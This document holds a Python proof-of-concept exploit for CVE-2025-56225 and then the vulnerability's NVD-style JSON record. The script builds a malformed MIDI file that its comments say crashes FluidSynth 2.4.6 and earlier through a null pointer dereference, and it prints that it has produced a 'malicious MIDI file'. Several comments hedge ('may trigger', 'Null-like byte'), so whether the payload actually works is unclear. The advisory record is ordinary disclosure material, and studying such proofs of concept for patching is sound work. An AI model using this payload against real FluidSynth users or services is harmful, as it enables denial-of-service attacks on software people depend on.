CVE-2025-56225

#!/usr/bin/env python3 """ CVE-2025-56225 PoC - FluidSynth Null Pointer Dereference This PoC generates a malformed MIDI file that triggers null pointer dereference in fluid_synth_monopoly.c when loaded by vulnerable FluidSynth versions. """ import struct def create_malformed_midi(): """ Generate a malformed MIDI file to trigger CVE-2025-56225 """ # MIDI Header midi_header = b'MThd' midi_header += struct.pack('>I', 6) # Header length midi_header += struct.pack('>H', 0) # Format type 0 midi_header += struct.pack('>H', 1) # Number of tracks midi_header += struct.pack('>H', 480) # Ticks per quarter note # Malformed Track chunk track_data = b'' # Add SysEx event that may trigger monopoly handling # This malformed data can cause null pointer in fluid_synth_monopoly track_data += struct.pack('>B', 0xF0) # SysEx start track_data += struct.pack('>B', 0x00) # Malformed length byte # Add Control Change with invalid monopoly-related controller track_data += struct.pack('>B', 0xB0) # Control Change track_data += struct.pack('>B', 0x7A) # Local Control (monopoly related) track_data += struct.pack('>B', 0x7F) # Invalid value # Add malformed data to trigger null dereference track_data += struct.pack('>B', 0x00) # Null-like byte track_data += struct.pack('>B', 0x00) # Null-like byte # End of track track_data += struct.pack('>B', 0xFF) # Meta event track_data += struct.pack('>B', 0x2F) # End of track track_data += struct.pack('>B', 0x00) # Length 0 # Wrap in MTrk chunk track_chunk = b'MTrk' track_chunk += struct.pack('>I', len(track_data)) track_chunk += track_data return midi_header + track_chunk if __name__ == '__main__': midi_data = create_malformed_midi() with open('CVE-2025-56225.mid', 'wb') as f: f.write(midi_data) print('[+] Generated malicious MIDI file: CVE-2025-56225.mid') print('[+] This file can trigger null pointer dereference in FluidSynth <= 2.4.6')

{"cve": {"id": "CVE-2025-56225", "sourceIdentifier": "[email protected]", "published": "2026-01-09T16:16:06.910", "lastModified": "2026-01-23T02:13:04.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "fluidsynth-2.4.6 and earlier versions is vulnerable to Null pointer dereference in fluid_synth_monopoly.c, that can be triggered when loading an invalid midi file."}, {"lang": "es", "value": "fluidsynth-2.4.6 y versiones anteriores es vulnerable a una desreferenciación de puntero nulo en fluid_synth_monopoly.c, que puede activarse al cargar un archivo midi no válido."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fluidsynth:fluidsynth:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.4.6", "matchCriteriaId": "F4FA607B-A19E-4BCD-A06F-044C7E6F43FB"}]}]}], "references": [{"url": "https://github.com/FluidSynth/fluidsynth/issues/1602", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/FluidSynth/fluidsynth/pull/1607", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/FluidSynth/fluidsynth/issues/1602", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}]}}